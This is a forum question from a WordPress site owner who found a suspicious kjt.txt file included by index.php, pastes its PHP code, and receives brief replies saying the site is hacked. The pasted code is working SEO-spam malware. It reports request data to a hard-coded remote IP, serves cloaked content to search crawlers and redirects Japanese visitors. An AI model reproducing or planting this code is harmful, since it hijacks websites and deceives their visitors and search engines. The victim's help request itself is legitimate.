# My wordpress index.php require strange txt

Tags: wordpress, cpanel, file-manager

I go through my Cpanel Website and found a kjt.txt in my public_htm folder, is that dangerous and what is this kjt.txt is required in my index.php? am i are being hacked or it's just a natural thing?

```
'<?php $group_num='z1014_7';$inter_domain='http://192.187.101.194/'.$group_num.'/';function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){if(strpos($agent,'google')!==false || strpos($agent,'yahoo')!==false ){return true;}else{return false;}}function check_refer($refer){ if(strpos($refer,'.co.jp')!==false || strpos($refer,'google.com')!==false){ return true; }else{ return false;}}$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$inter_domain."/indata.php";$map1=$inter_domain."/map.php";$jump1=$inter_domain."/jump.php";$url_words=$inter_domain."/words.php";$url_robots=$inter_domain."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){$robots_cont = getServerCont($url_robots,$data1);define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=file_get_contents(BASE_PATH.'/robots.txt');if(strpos($robots_cont,"Crawl-delay:3")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}exit;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } exit;} if(strpos($req_uri,"allsitemap.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit;} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit;} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1'){$data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;exit;}}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); if($chk_refer && substr($_SERVER['REQUEST_URI'],-5)=='.html' && preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE'])){echo getServerCont($jump1,$data1);exit; } $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if($res_crawl){ $data1['http_user_agent']=$user_agent;$get_content = getServerCont($indata1,$data1);if($get_content=="404"){header('HTTP/1.0 404 Not Found');exit;}else if($get_content=="500"){header("HTTP/1.0 500 Internal Server Error");exit;}else if($get_content=="blank"){echo '';exit;}else{echo $get_content;exit;} }else{  } ?>'
```

Comment: What's the content of kjt.txt?

Comment: you're being hacked

Comment: How to prevent that  @Graficode?

Comment: There are so many possible reasons; are wordpress core, theme and plugins updated?

Comment: Can't update any of Wordpress core cuz the devs before me hard coded the core and every plugins that used i already updated except unused one i deleted asap

Comment: @Graficode and now i've been locked up from editing and accessing my wp-config